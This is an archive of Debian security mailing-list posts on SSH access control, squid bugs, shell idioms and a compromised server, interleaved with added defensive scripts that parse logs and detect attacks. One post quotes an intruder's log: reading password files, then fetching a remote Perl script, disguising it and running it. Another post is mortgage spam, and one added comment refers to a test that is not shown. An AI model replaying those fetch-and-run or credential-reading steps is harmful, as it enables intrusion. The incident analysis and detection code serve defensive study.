2005-11-25 Thread Peter Palfrader
On Thu, 24 Nov 2005, Patrick wrote:

> I have an server running sshd on Sarge. I want all users to be able to
> access the computer from within the internal network - but restrict
> access from the internet (to users in a particular group). Can this be
> achieved by combining the /etc/hosts.allow or /etc/hosts.deny files and
> the AllowGroup (or AllowUsers) options in sshd configuration file.

You are looking for pam_access.

[EMAIL PROTECTED]:~$ grep -C3 access /etc/pam.d/ssh
# Standard Un*x authentication.
@include common-auth

# do etc/security/access checks
# weasel, Fri, 25 Feb 2005 12:05:42 +0100
account   required pam_access.so # [1]

# Standard Un*x authorization.
@include common-account

[EMAIL PROTECTED]:~$ tail -n5 /etc/security/access.conf
# weasel, Fri, 25 Feb 2005 12:06:57 +0100
+:ALL:127.
+:ALL:192.0.2.
+:weasel:ALL
-:ALL:ALL

HTH.
-- 
 PGP signed and encrypted  |  .''`.  ** Debian GNU/Linux **
messages preferred.| : :' :  The  universal
   | `. `'  Operating System
 http://www.palfrader.org/ |   `-http://www.debian.org/
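To see how the posted access.conf behaves before relying on it, here is an added example (not from the post) that evaluates rules the way pam_access does for the forms used above: `ALL`, a user name, a network prefix with a trailing dot and a domain suffix with a leading dot; the first matching line wins, and, the part that bites, access is granted when no rule matches at all. EXCEPT, LOCAL, group and netgroup syntax are left out. With sshd the origin is the client as PAM receives it, an address or, with reverse lookups enabled, a host name, so test both forms you expect to see, and remember that sshd only consults the PAM account stack with UsePAM yes.

```python
"""Added example (not from the list post): evaluate /etc/security/access.conf
rules the way pam_access does for the forms used in the posted file."""


def parse_access_conf(text):
    """[(allow, [user patterns], [origin patterns])] in file order."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = [p.strip() for p in line.split(":", 2)]
        if len(parts) != 3 or parts[0] not in ("+", "-") \
                or not parts[1] or not parts[2]:
            raise ValueError("malformed access.conf line: %r" % raw)
        perm, users, origins = parts
        rules.append((perm == "+", users.split(), origins.split()))
    return rules


def _user_matches(pattern, user):
    return pattern == "ALL" or pattern == user


def _origin_matches(pattern, origin):
    if pattern == "ALL":
        return True
    if pattern.endswith("."):            # network prefix, e.g. 192.0.2.
        return origin.startswith(pattern)
    if pattern.startswith("."):          # domain suffix, e.g. .example.org
        return origin.endswith(pattern)
    return pattern == origin             # exact host name, address or tty


def access_allowed(rules, user, origin):
    """First matching rule decides.  pam_access grants access when no rule
    matches, so a file without a final '-:ALL:ALL' is not a default deny."""
    for allow, users, origins in rules:
        if any(_user_matches(u, user) for u in users) and \
                any(_origin_matches(o, origin) for o in origins):
            return allow
    return True


def audit(rules, cases):
    """[(user, origin, allowed)] for a list of (user, origin) pairs."""
    return [(u, o, access_allowed(rules, u, o)) for u, o in cases]


# The tail of access.conf shown in the post.
POSTED_CONF = """\
# weasel, Fri, 25 Feb 2005 12:06:57 +0100
+:ALL:127.
+:ALL:192.0.2.
+:weasel:ALL
-:ALL:ALL
"""

if __name__ == "__main__":
    rules = parse_access_conf(POSTED_CONF)
    for row in audit(rules, [("alice", "192.0.2.15"), ("alice", "192.0.20.15"),
                             ("weasel", "203.0.113.9"), ("alice", "203.0.113.9")]):
        print(row)
```

The trailing dot in `192.0.2.` is what keeps the prefix per octet: `192.0.20.15` does not match it. The last assertion in the test shows the default-allow trap: drop the `-:ALL:ALL` line and everybody from everywhere is let in.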





Re: unsubscribe

2005-10-12 Thread Peter Palfrader
On Tue, 11 Oct 2005, Benjamin Maerte wrote:

> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact 
> [EMAIL PROTECTED]
> 

Learn to read the mails you're replying to, will you?

Peter
-- 
Gurer fubhyq or fbzr fbeg bs vagryyvtrapr grfg orsber lbh'er nyybjrq gb
wbva n yvfg.





Re: Abwesenheit

2005-09-19 Thread Peter Palfrader
On Mon, 19 Sep 2005, Florian Weimer wrote:

> > Is there a reason not to simply read the "Precedence: list" header
> > and simply not respond at all ?
> 
> "Precedence: list" is non-standard.  Technically speaking,
> RFC-compliant software should not use it. 8-/

That's not quite correct, software MAY use it.

RFC3834: Recommendations for Automatic Responses to Electronic Mail:

   -  A responder MAY refuse to send a response to a subject message
      which contains any header or content which makes it appear to the
      responder that a response would not be appropriate.  For instance,
      if the subject message contained a Precedence header field
      [I4.RFC 2076] with a value of "list" the responder might guess that
      the traffic had arrived from a mailing list, and would not respond
      if the response were only intended for personal messages.  For
      similar reasons, a responder MAY ignore any subject message with a
      List-* field [I5.RFC 2369].  (Because Precedence is not a standard
      header field, and its use and interpretation vary widely in the
      wild, no particular responder behavior in the presence of
      Precedence is recommended by this specification.)

-- 
 PGP signed and encrypted  |  .''`.  ** Debian GNU/Linux **
messages preferred.| : :' :  The  universal
   | `. `'  Operating System
 http://www.palfrader.org/ |   `-http://www.debian.org/





Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-08-23 Thread Peter Blancke
Daniel Hess <[EMAIL PROTECTED]> dixit:

> It starts to fail when the dstdom_regex acl is activated.

This could be. But -- I think -- also "dstdomain".

Two of my squid proxy servers that are not working correctly have lines in
squid.conf like these:

- The one server 'acl this_name dstdomain www.domain.tld'
- The other server 'acl that_name dstdom_regex
  "/etc/squid/wanted_url"'

Both servers are failing, so I installed an older version of squid.

Greetings,

Peter Blancke

-- 
Hoc est enim verbum meum!





Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-07-26 Thread Peter Blancke
Luigi Gangitano <[EMAIL PROTECTED]> dixit:

> Il giorno mar, 26/07/2005 alle 03.09 +0200, Daniel Hess ha scritto:
>> I can reproduce this by using wget on an URL which contains an ip
>> (for example: "wget http://193.99.144.85/";).

> Can you please tell me what DNS daemon is at work in this case
> (eg. bind, pdnsd, etc.)?

On a problematic server of mine with the same problem it's bind9.

(Debian/Woody, Squid-2.4.6-2woody9, Kernel 2.4.29)

Greetings

Peter Blancke

-- 
Hoc est enim verbum meum!





Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-07-13 Thread Peter Blancke
Peter Blancke <[EMAIL PROTECTED]> dixit:

> I've had the same problem; since removing squid's cache, creating
> the cache anew (squid -z) and restarting squid, 2.4.6-2woody9
> works fine and the problem didn't turn up.

I was pleased prematurely; today the same error occurred again.
Now a downgrade is required.

Gruss

Peter Blancke

-- 
Hoc est enim verbum meum!





Re: New squid packages 2.4.6-2woody9 restarts very often.

2005-07-12 Thread Peter Blancke
[EMAIL PROTECTED] <[EMAIL PROTECTED]> dixit:

> I have tried to install Version 2.4.6-2woody9 of the squid package
> on our Internet Gateway (Woody). There were no error messages
> during upgrade, but our Client get no connection to the proxy
> afterwards. I "fix" this temporary by reinstalling the previous
> version 2.4.6-2woody8.
>
> Looking in the logfiles shows, that squid 2.4.6-2woody9 restarts
> very often:

I've had the same problem; since removing squid's cache, creating
the cache anew (squid -z) and restarting squid, 2.4.6-2woody9
works fine and the problem didn't turn up.

Greetings

Peter Blancke

-- 
Hoc est enim verbum meum!





cvs 1.11.1p1debian-11 is in wrong distribution

2005-07-05 Thread Peter Lundkvist
cvs 1.11.1p1debian-11 seems to be in the wrong distribution:
should be in woody-security (oldstable) but is in sarge-security.

/peter





security for sarge?

2005-05-10 Thread peter green
In the most recent release update announcement it was said that the freeze
marked the start of security support for sarge.

From that mail:

>Joey Schulze of the security team has given the thumbs-up for official
>security support for sarge as of the time of the freeze.  Which is now.

However the messages on debian-security alerts make no mention of sarge
whatsoever.

Can anyone clarify what's going on?

p.s. please CC replies to me as i'm not on this list.






Conclusion: Compromised system - still ok?

2005-02-07 Thread DI Peter Burgstaller
Wow you guys,
thank you very much for all your input.
I'll sit down with the manager and we'll discuss which route to take.
My first instinct was to warm up those drives and get the tapes .. but I
may want to find out more as you guys have suggested! (Thanks to Jeroen,
Alvin and Roger)

The system is/was an absolutely unimportant backup-mx so I don't think
we'll qualify for three-letter help :)

In any case .. it has been a very interesting Sunday indeed. I'll try to
learn from my mistakes.

Thank you very much, Peter


Compromised system - still ok?

2005-02-06 Thread DI Peter Burgstaller
Hi everybody,
guess it was my time - this time...
Ok .. about 4 hours ago the following happened on one of my machines:
1) Somebody tried from one host (213.215.220.14) a dictionary attack
2) He/She/It got in using the user backup (I know.. I know ..)
3) H/S/I downloaded 2 files from a geocities.com account
4) File 1 - no idea what it is or what it does - cannot find it
5) File 2 - a perl script that "claims" to be a telnet server
After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis

Here is the snoopy log:
-
Feb  6 10:33:26 mail2 sshd[15544]: Accepted password for backup from 213.215.220.14 port 38842 ssh2
Feb  6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user backup by (uid=0)
Feb  6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb  6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb  6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user backup
Feb  6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for backup from 66.40.38.102 port 45424 ssh2
Feb  6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user backup by (uid=0)
Feb  6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb  6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb  6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb  6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname -a
Feb  6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb  6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: /sbin/ifconfig
Feb  6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat /etc/hosts
Feb  6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb  6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb  6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb  6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb  6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history
Feb  6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb  6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb  6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb  6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb  6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb  6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user backup
-

The telnet server doesn't seem to make any entries in wtmp, hence no 
`last` or `w` entries on the machine.
However, snoopy still sees usage by the user :)

ASAI can say H/S/I hasn't been on my machine since. The firewall didn't 
permit access to the port (34567)
opened by the perl script and my firewall log says no access to that 
port before I tried it from localhost.

The machine runs a linux 2.4.27-grsec-hi woody testing
I'm considering taking it back online with a 2.4.29-grsec-hi, what do 
you guys think?

- - Many thanks, Peter
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (Darwin)
iEYEARECAAYFAkIGSmMACgkQ7qdt1xpQls/FOwCfSDJbpUyuAMES5KYMQKQMVcCd
im0AoIhY+DeJghyPAGm2Fv4RAuWvycQV
=ctGL
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
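
The log above is the kind of evidence snoopy gives you: one line per exec, tied together by the session id rather than by pid. As an added example (not code from the post or from snoopy itself), the script below rebuilds per-session command timelines from such lines and flags the sequence visible in the post, a download followed in the same session by chmod and an interpreter run. SNOOPY_SAMPLE is constructed to match snoopy's "[user, uid:N sid:M]: command" format; host name, pids, file names and the download host are placeholders. It assumes a POSIX sh with awk, sort and sed.

```sh
#!/bin/sh
# Added example, not code from the post: rebuild per-session command
# timelines from snoopy log lines and flag the fetch-then-execute pattern
# the post's log shows. SNOOPY_SAMPLE is constructed to match snoopy's
# "[user, uid:N sid:M]: command" format; host name, pids, file and host
# names are placeholders.

SNOOPY_SAMPLE='Feb  6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb  6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb  6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb  6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb  6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget example.invalid/payload.p
Feb  6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv payload.pl.txt .bash_history
Feb  6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb  6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb  6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x'

# Emit "sid<TAB>user<TAB>command" for every snoopy line, in log order.
# The sid is snoopy's session id (the login shell's pid); it is what ties
# the commands of one login together even though each exec has its own pid.
snoopy_commands() {
    printf '%s\n' "$1" | awk '
        /snoopy\[[0-9]+\]: / {
            if (match($0, /\[[^]]*, uid:[0-9]+ sid:[0-9]+\]: /)) {
                hdr = substr($0, RSTART + 1, RLENGTH - 4)   # drop "[" and "]: "
                cmd = substr($0, RSTART + RLENGTH)
                split(hdr, f, / /)      # f[1]="user," f[2]="uid:N" f[3]="sid:M"
                user = f[1]; sub(/,$/, "", user)
                sid = f[3]; sub(/^sid:/, "", sid)
                print sid "\t" user "\t" cmd
            }
        }'
}

# Number of commands snoopy recorded for one session id ($2).
session_command_count() {
    snoopy_commands "$1" | awk -F'\t' -v sid="$2" '$1 == sid { n++ } END { print n + 0 }'
}

# Full timeline of one session, one command per line.
session_timeline() {
    snoopy_commands "$1" | awk -F'\t' -v sid="$2" '$1 == sid { print $3 }'
}

# Print the sids in which a download is later followed, in the same
# session, by chmod and then an interpreter run. That is the sequence in
# the post: wget, mv to an innocuous name, chmod 755, perl. The stage
# counter only advances in that order, so "chmod" before any download
# does not count.
flag_fetch_then_exec() {
    snoopy_commands "$1" | awk -F'\t' '
        {
            sid = $1; cmd = $3
            if (cmd ~ /^(wget|curl|ftp|lynx) / && stage[sid] < 1) stage[sid] = 1
            else if (cmd ~ /^chmod / && stage[sid] == 1) stage[sid] = 2
            else if (cmd ~ /^(perl|python|sh|bash) / && stage[sid] == 2) stage[sid] = 3
        }
        END { for (s in stage) if (stage[s] == 3) print s }' | sort
}

# Run stand-alone: report flagged sessions with their timelines.
for s in $(flag_fetch_then_exec "$SNOOPY_SAMPLE"); do
    echo "session $s: $(session_command_count "$SNOOPY_SAMPLE" "$s") commands, fetch-then-exec pattern"
    session_timeline "$SNOOPY_SAMPLE" "$s" | sed 's/^/    /'
done
```

Matching on the session id rather than the pid is the point: in the post's log the interesting session is sid 22447, and every command in it has a different pid. The stage counter is deliberately strict about order, so a plain `chmod` on its own, or an interpreter run without a preceding download, is not flagged; loosen the regexes if your users legitimately fetch and run scripts.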


Re: [OT] Collective memory query

2004-10-08 Thread Peter Cordes
On Wed, Sep 29, 2004 at 10:08:28PM +0200, Adrian 'Dagurashibanipal' von Bidder wrote:
> On Tuesday 28 September 2004 15.49, Bartosz Fenski aka fEnIo wrote:
> > On Mon, Sep 27, 2004 at 06:38:03PM +0200, Adrian 'Dagurashibanipal' von 
> Bidder wrote:
> > > > for foo in `find . -name "something"`
> > >
> > > Note that
> > > $ for foo in `command outputting a list of filenames`
> > >
> > > should *always* be replaced by
> > >
> > > $ said command | while read foo; do ...
> [...]
> > So what is the magic barrier when this should stop working?
> > I'm just curious.
> 
> 
> Hmm. I can't comment on that specifically, for current versions of some 
> shells. I know I have seen 'command line too long' messages in the past 
> when using `find ...` constructs, and I bet that on busybox based rescue 
> disks and other restricted shells this topic will still be relevant.

 The "line too long" limit applies when trying to execve(2) anything.
There's a limit there.  For shell built-ins, there doesn't have to be a
limit, but as you point out, busybox might have one.

> In any case, using the while loop will pipeline the operations so you get 
> full benefit from multitasking.

 Yeah, that's an elegant idiom.  I'll have to remember to use it in the
future. :)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


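
The two constructs discussed in the thread above, as an added example that is not part of any post: a loop over command-substitution output expands the whole list into the shell's word list first (which is what runs into the execve(2) argument limit once it is handed to an external command) and splits it on whitespace, while the pipeline streams names one at a time. It assumes a POSIX sh with find, mktemp and getconf; the scratch directory and its file names are constructed here.

```sh
#!/bin/sh
# Added example, not code from the thread: show why `for f in $(find ...)`
# is unreliable and what the streaming pipeline buys. The scratch directory
# and its file names are constructed here.

# Create a directory holding file names with single and double spaces and
# print its path.
make_scratch_dir() {
    d=$(mktemp -d) || return 1
    : > "$d/plain.txt"
    : > "$d/with space.txt"
    : > "$d/two  spaces.txt"
    printf '%s\n' "$d"
}

# Loop over command-substitution output: the whole file list is expanded
# into the shell's word list first (so it counts towards the execve
# argument limit as soon as it is passed on to an external command), and
# it is split on whitespace, so a name with a space becomes several items.
count_split_loop() {
    n=0
    for f in $(find "$1" -type f -name '*.txt'); do
        n=$((n + 1))
    done
    echo "$n"
}

# Streaming pipeline: find writes names one per line as it goes, the loop
# consumes them as they arrive, nothing is ever passed as arguments, and
# IFS= plus read -r keep each line intact. (Names containing newlines
# would still need -print0 and a NUL-aware reader.) The count is echoed
# inside the subshell because the loop runs on the right of the pipe.
count_stream_loop() {
    find "$1" -type f -name '*.txt' | {
        n=0
        while IFS= read -r f; do
            [ -f "$f" ] && n=$((n + 1))
        done
        echo "$n"
    }
}

# Kernel limit on the total size of argv plus envp handed to execve(2);
# this is the limit behind "argument list too long".
arg_max() {
    getconf ARG_MAX
}

# Run stand-alone.
d=$(make_scratch_dir)
echo "word-splitting loop saw $(count_split_loop "$d") items"
echo "streaming loop saw     $(count_stream_loop "$d") items"
echo "ARG_MAX on this system: $(arg_max)"
rm -rf "$d"
```

With three files the split loop reports five items and the streaming loop three. Note that the `while read` idiom from the thread is only a partial fix: a file name containing a newline still breaks it, and the robust forms are `find ... -exec cmd {} +` (which batches arguments under the ARG_MAX limit itself) or `-print0` feeding `xargs -0`.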



Re: [sec] Re: failed root login attempts

2004-09-28 Thread Peter Cordes
On Tue, Sep 21, 2004 at 01:45:46PM +0100, Steve Kemp wrote:
> On Sun, 19 Sep 2004, martin f krafft wrote:
>  
> > > If you ask me, logcheck should learn how to evaluate log messages in
> > > their context...
> 
>   If you want to have instant alerts of  problems then logcheck is 
>  what you want.  If you to ignore some things and still receive timely
>  alerts then you're looking at something which can read your mind!
> 
>   If you can define what it is you don't want to see then logcheck
>  can handle that via the pattern files in logchecks ignore.d/ hierarchy.

 Not if the pattern you want to ignore is more than one line.  egrep is
purely line-by-line.  This worm (or script-kiddie zombie?) always tries
root, admin, then test, ...

 If it ever starts trying account names that actually exist, and aren't
blocked from logging in entirely, I might see if I can get something to use
iptables to block that IP for 15 minutes after seeing that sequence, since
it's a perfect signal that it's a bogus attack, and that it will try a bunch
of logins right away, then never come back.

 Has anyone logged the passwords these attacks try?

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature
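
The multi-line correlation the post says logcheck cannot do, as an added example that is not code from the post or from logcheck: the script groups sshd failure lines by source address and recognises the fixed probe sequence (root, then admin, then test) as one event, which a per-line egrep pattern cannot. AUTH_SAMPLE is constructed; host name, pids and addresses are placeholders, and both the older "illegal user" and newer "invalid user" wording of sshd are accepted. The iptables rule is only printed, not applied. It assumes a POSIX sh with awk and sort.

```sh
#!/bin/sh
# Added example, not code from the post: correlate sshd failure lines across
# several log entries so that the fixed probe sequence the post describes
# (root, then admin, then test from one source) is recognised as a unit,
# which a single-line egrep rule in logcheck cannot do. AUTH_SAMPLE is
# constructed; host name, pids and addresses are placeholders.

AUTH_SAMPLE='Sep 21 03:12:01 host sshd[4120]: Failed password for root from 192.0.2.10 port 40112 ssh2
Sep 21 03:12:03 host sshd[4122]: Failed password for illegal user admin from 192.0.2.10 port 40113 ssh2
Sep 21 03:12:05 host sshd[4124]: Failed password for illegal user test from 192.0.2.10 port 40114 ssh2
Sep 21 03:12:09 host sshd[4126]: Failed password for illegal user guest from 192.0.2.10 port 40115 ssh2
Sep 21 08:40:10 host sshd[5000]: Failed password for root from 198.51.100.7 port 51000 ssh2
Sep 21 08:41:30 host sshd[5002]: Failed password for alice from 198.51.100.7 port 51001 ssh2
Sep 21 09:00:00 host sshd[5100]: Accepted publickey for bob from 203.0.113.5 port 60000 ssh2'

# Emit "ip<TAB>user" for every failed password line, in log order. Both the
# older "illegal user" and the newer "invalid user" wording are handled.
failed_logins() {
    printf '%s\n' "$1" | awk '
        /sshd\[[0-9]+\]: Failed password for / {
            line = $0
            sub(/.*Failed password for /, "", line)
            sub(/^(illegal|invalid) user /, "", line)
            split(line, w, / /)      # w[1]=user w[2]="from" w[3]=ip
            print w[3] "\t" w[1]
        }'
}

# Print the source addresses whose attempts contain root, admin, test in
# that order and consecutively, one per line, sorted.
flag_probe_sequence() {
    failed_logins "$1" | awk -F'\t' '
        { seq[$1] = seq[$1] " " $2 }
        END { for (ip in seq) if (seq[ip] ~ / root admin test( |$)/) print ip }' | sort
}

# Number of distinct user names tried from one address ($2).
distinct_users_from() {
    failed_logins "$1" | awk -F'\t' -v ip="$2" '
        $1 == ip { u[$2] = 1 }
        END { n = 0; for (k in u) n++; print n }'
}

# The rule a reactive blocker would install for a flagged address; printed
# here, not applied. Removing it again after the 15 minutes the post
# suggests is left to whatever schedules the unblock.
block_rule_for() {
    printf 'iptables -I INPUT -s %s -p tcp --dport 22 -j DROP\n' "$1"
}

# Run stand-alone.
for ip in $(flag_probe_sequence "$AUTH_SAMPLE"); do
    echo "$ip tried $(distinct_users_from "$AUTH_SAMPLE" "$ip") names including the root/admin/test probe sequence"
    echo "  would run: $(block_rule_for "$ip")"
done
```

The sequence check is the whole point: one failed root login from an address is noise, but root, admin and test in that order from the same source is the signature the post describes, and treating it as one event lets you ignore it in logcheck (or act on it) without suppressing genuine failed root logins. The rule printed by block_rule_for is what a wrapper would feed to iptables; keeping the decision and the action in separate functions makes the detection testable on sample lines without touching the firewall.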


Re: telnetd vulnerability from BUGTRAQ

2004-09-24 Thread Peter McAlpine
On Fri, 2004-09-24 at 18:35, Dale Amon wrote:
> On Sat, Sep 25, 2004 at 08:28:13AM +1000, Matthew Palmer wrote:
> > Cisco gear contains the Debian telnetd?  And if that's true, how would us
> > releasing a DSA for it necessarily help all the Cisco routers out there.
> > We're not talking about the general intelligence of using telnet (or, at
> > least, that wasn't the initial topic of discussion), but rather the
> > possibility of fixing security problems in the stock telnetd in Debian.
> 
> The question asked was "why is anyone still using telnet
> when there is ssh". And I would say that Cisco and some
> other gear are about the only reasons why anyone would
> still make a connection with the telnet protocol (other
> than for testing odd things... I used to use 'telnet foo 110'
> to hand test my company pop server when someone had problems.

I totally agree that ssh should definitely be used if available, but
telnetd has saved me more than once.

For example, I am responsible for maintaining machines all over the
world, and telnet will allow me to login more quickly than ssh if the
machine is under some extremely high load and is about to crash without
intervention.

I've also had some twit administrator change the permissions on an ssh
directory, or run ssh-keygen without thinking, and as a result I'm
unable to connect via ssh. telnet is all that saved me from waking
somebody up at 3am to get access to a machine in another country.

In addition, some machines I maintain are rather old, and the load
caused by ssh has become a concern on these machines. Also, you try
finding ssh-client rpms for Redhat Manhattan (5.0) which will properly
and reliably communicate with any recent version of sshd.

(Note that in all these examples I've been telnet'ing over a private
frame connection or VPN).

> So no, I was not replying about Debian fixes, I was replying
> to the general question of 'why telnet at all'.


signature.asc
Description: This is a digitally signed message part


Re: mod_ssl 2.8.19 for Apache 1.3.31

2004-07-21 Thread Peter Holm
On Tue, 20 Jul 2004 13:10:08 +0200, Peter Holm <[EMAIL PROTECTED]> wrote:

>Please point me to a website where all the things, that you mentioned,
>are explained in detail and what exactly volunteers can do to help the
>security team, so I can decide, on which point I can jump in and help.

This was not a joke. If there was a nice howto-like website non-guru
debian users could follow the needs of the security team, maybe you
would get more help. 

I am a typical "intermediate" user. I know how to compile kernel and
software, getting deeper into it every day, I am constantly reading on
with all kinds of tutorials / manuals / books to deepen my knowledge
and would be happy to contribute something to the debian project, if
it was only following some step-by-step instructions on doing some
tests. 

Following some clear instructions would enable me, and I think lots of
other "willing contributors", to help. 

For me it seems like a lot of work of the debian project is hidden
behind a curtain of "higher expertise", not easy to understand what
happens behind that curtain. It is not too openly documented, how
exactly are all the processes organized and, most importantly, jump-in
points for starters are not easily found. Not everybody has the time to
follow endless discussions on mailing lists: I need a simply
structured website with instructions on "how to help". 

All the things that you asked me I never knew that the security team
has a demand for. In fact, the security team is an extremely "dark
corner" of the debian project, I never read anything about it and how
its work is done. 

If you need help on that project, why do you make it so hard to step
in?

Thanks for your attention,
Peter





Re: mod_ssl 2.8.19 for Apache 1.3.31

2004-07-20 Thread Peter Holm
On Tue, 20 Jul 2004 01:50:07 +0200, Greg Folkert
<[EMAIL PROTECTED]> wrote:

>Can you in fact do anything to help out? Are you even willing to
>Volunteer?

Please point me to a website where all the things, that you mentioned,
are explained in detail and what exactly volunteers can do to help the
security team, so I can decide, on which point I can jump in and help.

Peter





Re: mod_ssl 2.8.19 for Apache 1.3.31

2004-07-19 Thread Peter Holm
On Mon, 19 Jul 2004 23:30:14 +0200, Phillip Hofmeister
<[EMAIL PROTECTED]> wrote:

>Is this line in your /etc/apt/sources.list (or a line like it...)
>deb http://security.debian.org stable/updates main non-free contrib

my /etc/apt/sources.list contains:

deb http://security.debian.org/ stable/updates main

does this affect updates for mod_ssl? I see nothing about an available
update for this mod_ssl problem on debian.org/security?

Thanks for your attention and help!

Peter





mod_ssl 2.8.19 for Apache 1.3.31

2004-07-19 Thread Peter Holm
Hi,

as you can see [1] there was a problem with mod_ssl. Are there any
security updates for woody? I see nothing with apt-get upgrade, am I
doing something wrong? Or do I have to install new mod_ssl package
myself? 

My understanding of the debian packaging system was that I would NOT
have to install packages myself, as security fixes will be provided
with apt-get update / upgrade. Is this not correct?


[1] http://www.mail-archive.com/[EMAIL PROTECTED]/msg16853.html


Thank you very much for your attention,
Peter





Don't worry, just listen

2004-05-11 Thread Peter Shipman
Thank you for your   mor tg age   application, which we received yesterday.
We are glad to confirm that your application is accepted and you can
get the lowest fixed rate.

Could we ask you to please fill out our 15 second post-application for more 
details.

http://gotmortgageloans.com/?partid=saving

Yours sincerely,
Justin T. Lockhart
Mor tg age   Broker Association.




To modify your future preference with us: 
http://gotmortgageloans.com/st.html 

inductance ecumenist jocular controvertible punster uproot possemen von 
cadillac capitoline barberry coxcomb abdicate invoice pothole bayou spherule 
heterogeneity surrogate decouple hone kiwanis blackburn turvy forrest dialectic 
curran 

whizzing further coachwork chalice stevenson suck manslaughter davenport auto 
guerdon sherwood whore plasm invertebrate copernican tan rotarian rainbow 
pisces scarf betoken vest punctuate compline stormbound geophysical stake harry 
facsimile 






Re: [SECURITY] [DSA 479-1] New Linux 2.4.18 packages fix local root exploit (source+alpha+i386+powerpc)

2004-04-15 Thread Peter Cordes
On Thu, Apr 15, 2004 at 09:33:32PM +0200, David R wrote:
> Yes, any ideas how to fix this? I'm a newbie, so a bit new to Linux. When I
> installed this 2.4.18 package, it blew up my network card, so I am unable to
> get the new, fixed package. I thought about using apt-get remove to get rid
> of the patched kernel, but somehow this seemed ungood to me, so I tried
> booting from LinuxOLD, which points to the original (as far as I can tell)
> vmlinuz-2.4.18-686. However, when I try this, I get the following error:
> 
> Kernel Panic: VFS: Unable to mount root FS on 03:01

 I'm guessing that the wrong initrd is getting loaded for the kernel that's
booting.  Check your /boot/grub/menu.lst (or /etc/lilo.conf), and the
symlinks in /boot for initrd-old.img (or whatever it's called).

> What do I do? Do I use apt-get remove to get rid of the patched kernel? Do I
> do something else?

 Probably better to get a working kernel booted before you remove anything.
If you have any kernel .debs that used to work, you could try installing one
with dpkg -i.  This might end up downgrading a kernel package you have
installed, but just removing things won't help.  (Debian's package scripts
usually leave the /boot symlinks broken when I remove a kernel package, even
if it was totally obsolete and the links weren't pointing to any files from
that package...)  Your best bet is to look at the symlinks yourself, and get
them pointing to the right place.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC






rsh to ssh migration

2004-03-19 Thread Peter McAlpine
